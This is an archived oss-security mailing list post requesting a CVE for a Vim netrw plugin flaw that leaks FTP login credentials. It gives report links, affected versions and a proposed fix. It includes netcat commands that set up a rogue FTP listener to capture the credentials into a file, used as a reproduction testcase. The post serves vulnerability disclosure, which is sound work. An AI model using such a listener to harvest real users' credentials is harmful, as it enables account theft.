[<prev] [next>] [month] [year] [list]
Date: Mon, 6 Oct 2008 06:26:24 -0400 (EDT)
From: Jan Lieskovsky <jlieskov@...hat.com>
To: coley@...re.org
Cc: oss-security@...ts.openwall.com,
Jan MinĂ¡Å. <rdancer@...ncer.org>
Subject: CVE request - (vim : netrw plugin - ftp user
credentials disclosure)
Hello Steve,
could you please allocate a new CVE id for the following
Vim issue:
Vulnerability reports: 1, http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html
(This is another issue than CVE-2008-2712).
2, https://bugzilla.redhat.com/show_bug.cgi?id=461750
Thread discussing this issue:
http://groups.google.com/group/vim_dev/browse_thread/thread/2f6fad581a037971/a5fcf4c4981d34e6?show_docid=a5fcf4c4981d34e6
Proposed partial fix:
http://mysite.verizon.net/astronaut/vim/index.html#NETRW
Affected Vim netrw plugin versions:
a, Vim 7.0 autoloaded netrw plugin versions - from " Date: Jul 24, 2006, Version: 102" till the latest.
b, older versions of Vim netrw may be also affected.
Testcase available at:
http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html (part 4. EXPLOIT)
Note: Slightly modification of the testcase in the "netcat" part may be needed
to successfully reproduce the issue. I was using:
printf '220\r\n331\r\n' | nc -l ftp.rogue.example.com 31337 > credentials&
(and for simulation of successful FTP session login the command:
printf '220\r\n331\r\n230\r\n' | nc -l ftp.rogue.example 31337 > credentials &)
Thanks, Jan
--
Jan iankko Lieskovsky / Red Hat Security Response Team
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list.
Hosted by DataForce ISP -
Powered by Openwall GNU/*/Linux